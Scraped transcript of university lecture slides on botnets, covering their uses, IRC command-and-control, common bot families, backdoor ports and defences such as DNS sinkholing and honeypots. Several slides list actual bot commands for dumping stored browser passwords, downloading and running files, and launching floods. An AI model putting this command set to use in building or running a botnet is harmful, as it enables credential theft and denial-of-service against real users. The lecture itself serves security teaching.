cap6135: malware and software vulnerability analysis botnets cliff zou spring 2012
DESCRIPTION
CAP6135: Malware and Software Vulnerability Analysis Botnets Cliff Zou Spring 2012. Acknowledgement. This lecture uses some contents from the lecture notes from: Dr. Dawn Song: CS161: computer security Richard Wang – SophosLabs: The Development of Botnets - PowerPoint PPT PresentationTRANSCRIPT
![Page 1: CAP6135: Malware and Software Vulnerability Analysis Botnets Cliff Zou Spring 2012](https://reader035.vdocument.in/reader035/viewer/2022062410/56815e02550346895dcc4844/html5/thumbnails/1.jpg)
CAP6135: Malware and Software Vulnerability Analysis
BotnetsCliff Zou
Spring 2012
![Page 2: CAP6135: Malware and Software Vulnerability Analysis Botnets Cliff Zou Spring 2012](https://reader035.vdocument.in/reader035/viewer/2022062410/56815e02550346895dcc4844/html5/thumbnails/2.jpg)
2
Acknowledgement This lecture uses some contents from the lecture
notes from: Dr. Dawn Song: CS161: computer security Richard Wang – SophosLabs: The Development of
Botnets Randy Marchany - VA Tech IT Security Lab: Botnets
![Page 3: CAP6135: Malware and Software Vulnerability Analysis Botnets Cliff Zou Spring 2012](https://reader035.vdocument.in/reader035/viewer/2022062410/56815e02550346895dcc4844/html5/thumbnails/3.jpg)
3
Botnets Collection of compromised hosts
Spread like worms and viruses Once installed, respond to remote commands
A network of ‘bots’ robot :
an automatic machine that can be programmed to perform specific tasks.
Also known as ‘zombies’
![Page 4: CAP6135: Malware and Software Vulnerability Analysis Botnets Cliff Zou Spring 2012](https://reader035.vdocument.in/reader035/viewer/2022062410/56815e02550346895dcc4844/html5/thumbnails/4.jpg)
4
Platform for many attacks Spam forwarding (70% of all spam?) Click fraud Keystroke logging Distributed denial of service attacks
Serious problem Top concern of banks, online merchants Vint Cerf: ¼ of hosts connected to Internet
![Page 5: CAP6135: Malware and Software Vulnerability Analysis Botnets Cliff Zou Spring 2012](https://reader035.vdocument.in/reader035/viewer/2022062410/56815e02550346895dcc4844/html5/thumbnails/5.jpg)
5
What are botnets used for?
![Page 6: CAP6135: Malware and Software Vulnerability Analysis Botnets Cliff Zou Spring 2012](https://reader035.vdocument.in/reader035/viewer/2022062410/56815e02550346895dcc4844/html5/thumbnails/6.jpg)
6
IRC (Internet Relay Chat) based Control
![Page 7: CAP6135: Malware and Software Vulnerability Analysis Botnets Cliff Zou Spring 2012](https://reader035.vdocument.in/reader035/viewer/2022062410/56815e02550346895dcc4844/html5/thumbnails/7.jpg)
7
IRC (Internet Relay Chat) based Control
![Page 8: CAP6135: Malware and Software Vulnerability Analysis Botnets Cliff Zou Spring 2012](https://reader035.vdocument.in/reader035/viewer/2022062410/56815e02550346895dcc4844/html5/thumbnails/8.jpg)
8
Why IRC? IRC servers are:
freely available easy to manage easy to subvert
Attackers have experience with IRC IRC bots usually have a way to
remotely upgrade victims with new payloads to stay ahead of security efforts
![Page 9: CAP6135: Malware and Software Vulnerability Analysis Botnets Cliff Zou Spring 2012](https://reader035.vdocument.in/reader035/viewer/2022062410/56815e02550346895dcc4844/html5/thumbnails/9.jpg)
9
How bad is the problem? Symantec identified a 400K node
botnet Netadmin in the Netherlands
discovered 1-2M unique IPs associated with Phatbot infections. Phatbot harvests MyDoom and Bagel
infected machines. Researchers in Gtech monitored
thousands of botnets
![Page 10: CAP6135: Malware and Software Vulnerability Analysis Botnets Cliff Zou Spring 2012](https://reader035.vdocument.in/reader035/viewer/2022062410/56815e02550346895dcc4844/html5/thumbnails/10.jpg)
10
Spreading Problem Spreading mechanism is a leading
cause of background noise Port 445, 135, 139, 137 accounted for
80% of traffic captured by German Honeynet Project
Other ports 2745 – bagle backdoor 3127 – MyDoom backdoor 3410 – Optix trojan backdoor 5000 – upnp vulnerability
![Page 11: CAP6135: Malware and Software Vulnerability Analysis Botnets Cliff Zou Spring 2012](https://reader035.vdocument.in/reader035/viewer/2022062410/56815e02550346895dcc4844/html5/thumbnails/11.jpg)
Most commonly used Bot familiesAgobotSDBotSpyBotGT Bot
![Page 12: CAP6135: Malware and Software Vulnerability Analysis Botnets Cliff Zou Spring 2012](https://reader035.vdocument.in/reader035/viewer/2022062410/56815e02550346895dcc4844/html5/thumbnails/12.jpg)
Agobot
Most sophisticated 20,000 lines C/C++ code IRC based command/control Large collection of target exploits Capable of many DoS attack types Shell encoding/polymorphic obfuscation Traffic sniffers/key logging Defend/fortify compromised system Ability to frustrate dissassembly
![Page 13: CAP6135: Malware and Software Vulnerability Analysis Botnets Cliff Zou Spring 2012](https://reader035.vdocument.in/reader035/viewer/2022062410/56815e02550346895dcc4844/html5/thumbnails/13.jpg)
SDBot Simpler than Agobot, 2,000 lines C code Non-malicious at base Utilize IRC-based command/control Easily extended for malicious purposes
Scanning DoS Attacks Sniffers Information harvesting Encryption
![Page 14: CAP6135: Malware and Software Vulnerability Analysis Botnets Cliff Zou Spring 2012](https://reader035.vdocument.in/reader035/viewer/2022062410/56815e02550346895dcc4844/html5/thumbnails/14.jpg)
SpyBot <3,000 lines C code Possibly evolved from SDBot
Similar command/control engine No attempts to hide malicious purposes
![Page 15: CAP6135: Malware and Software Vulnerability Analysis Botnets Cliff Zou Spring 2012](https://reader035.vdocument.in/reader035/viewer/2022062410/56815e02550346895dcc4844/html5/thumbnails/15.jpg)
GT Bot Functions based on mIRC scripting
capabilities HideWindow program hides bot on
local system Basic rootkit function
Port scanning, DoS attacks, exploits for RPC and NetBIOS
![Page 16: CAP6135: Malware and Software Vulnerability Analysis Botnets Cliff Zou Spring 2012](https://reader035.vdocument.in/reader035/viewer/2022062410/56815e02550346895dcc4844/html5/thumbnails/16.jpg)
Variance in codebase size, structure, complexity, implementation
Convergence in set of functions Possibility for defense systems effective across
bot families Bot families extensible Agobot likely to become dominant
![Page 17: CAP6135: Malware and Software Vulnerability Analysis Botnets Cliff Zou Spring 2012](https://reader035.vdocument.in/reader035/viewer/2022062410/56815e02550346895dcc4844/html5/thumbnails/17.jpg)
All of the above use IRC for command/control
Disrupt IRC, disable bots Sniff IRC traffic for commands Shutdown channels used for Botnets
IRC operators play central role in stopping botnet traffic
But a botnet could use its own IRC server Automated traffic identification required Future botnets may move away from IRC
Move to P2P communication Traffic fingerprinting still useful for
identification
Control
![Page 18: CAP6135: Malware and Software Vulnerability Analysis Botnets Cliff Zou Spring 2012](https://reader035.vdocument.in/reader035/viewer/2022062410/56815e02550346895dcc4844/html5/thumbnails/18.jpg)
Host control Fortify system against other malicious
attacks Disable anti-virus software Harvest sensitive information
PayPal, software keys, etc. Economic incentives for botnets
Stresses need to patch/protect systems prior to attack
Stronger protection boundaries required across applications in OSes
![Page 19: CAP6135: Malware and Software Vulnerability Analysis Botnets Cliff Zou Spring 2012](https://reader035.vdocument.in/reader035/viewer/2022062410/56815e02550346895dcc4844/html5/thumbnails/19.jpg)
19
Example Botnet Commands Connection
CLIENT: PASS <password> HOST : (if error, disconnect) CLIENT: NICK <nick> HOST : NICKERROR | CONNECTED
Pass hierarchy info BOTINFO <nick> <connected_to>
<priority> BOTQUIT <nick>
![Page 20: CAP6135: Malware and Software Vulnerability Analysis Botnets Cliff Zou Spring 2012](https://reader035.vdocument.in/reader035/viewer/2022062410/56815e02550346895dcc4844/html5/thumbnails/20.jpg)
20
Example Botnet Commands IRC Commands
CHANJOIN <tag> <channel> CHANPART <tag> <channel> CHANOP <tag> <channel> CHANKICK <tag> <channel> CHANBANNED <tag> <channel> CHANPRIORITY <ircnet> <channel>
<LOW/NORMAL/HIGH>
![Page 21: CAP6135: Malware and Software Vulnerability Analysis Botnets Cliff Zou Spring 2012](https://reader035.vdocument.in/reader035/viewer/2022062410/56815e02550346895dcc4844/html5/thumbnails/21.jpg)
21
Example Botnet Commands pstore
Display all usernames/passwords stored in browsers of infected systems
bot.execute Run executable on remote system
bot.open Reads file on remote computer
bot.command Runs command with system()
![Page 22: CAP6135: Malware and Software Vulnerability Analysis Botnets Cliff Zou Spring 2012](https://reader035.vdocument.in/reader035/viewer/2022062410/56815e02550346895dcc4844/html5/thumbnails/22.jpg)
22
Example Botnet Commands http.execute
Download and execute file through http ftp.execute
ddos.udpflood ddos.synflod ddos.phaticmp redirect.http redirect.socks
![Page 23: CAP6135: Malware and Software Vulnerability Analysis Botnets Cliff Zou Spring 2012](https://reader035.vdocument.in/reader035/viewer/2022062410/56815e02550346895dcc4844/html5/thumbnails/23.jpg)
23
Current Botnet Control Architecture
bot bot
C&C
botmaster
bot
C&C
•More than one C&C server•Spread all around the world
![Page 24: CAP6135: Malware and Software Vulnerability Analysis Botnets Cliff Zou Spring 2012](https://reader035.vdocument.in/reader035/viewer/2022062410/56815e02550346895dcc4844/html5/thumbnails/24.jpg)
24
Botnet Monitor: Gatech KarstNet A lot bots use Dyn-DNS
name to find C&C
bot
bot
C&C
attacker
C&C
KarstNet sinkhole
cc1.com KarstNet informs DNS
provider of cc1.com Detect cc1.com by its abnormal
DNS queries
DNS provider maps cc1.com to Gatech sinkhole (DNS hijack)
bot
All/most bots attempt to connect the sinkhole
![Page 25: CAP6135: Malware and Software Vulnerability Analysis Botnets Cliff Zou Spring 2012](https://reader035.vdocument.in/reader035/viewer/2022062410/56815e02550346895dcc4844/html5/thumbnails/25.jpg)
Botnet Monitor: Honeypot Spy Security researchers set up honeypots
Honeypots: deliberately set up vulnerable machines When compromised, put close monitoring of malware’s behaviors Tutorial: http://en.wikipedia.org/wiki/Honeypot_%28computing
%29 When compromised honeypot joins a botnet
Passive monitoring: log all network traffic Active monitoring: actively contact other bots to obtain more
information (neighborhood list, additional c&c, etc.) Representative research paper:
A multifaceted approach to understanding the botnet phenomenon, Abu Rajab, Moheeb and Zarfoss, Jay and Monrose, Fabian and Terzis, Andreas, 6th ACM SIGCOMM conference on Internet measurement (IMC), 2006.
25
![Page 26: CAP6135: Malware and Software Vulnerability Analysis Botnets Cliff Zou Spring 2012](https://reader035.vdocument.in/reader035/viewer/2022062410/56815e02550346895dcc4844/html5/thumbnails/26.jpg)
26
The Future Generation of Botnets Peer-to-Peer C&C
Polymorphism
Anti-honeypot
Rootkit techniques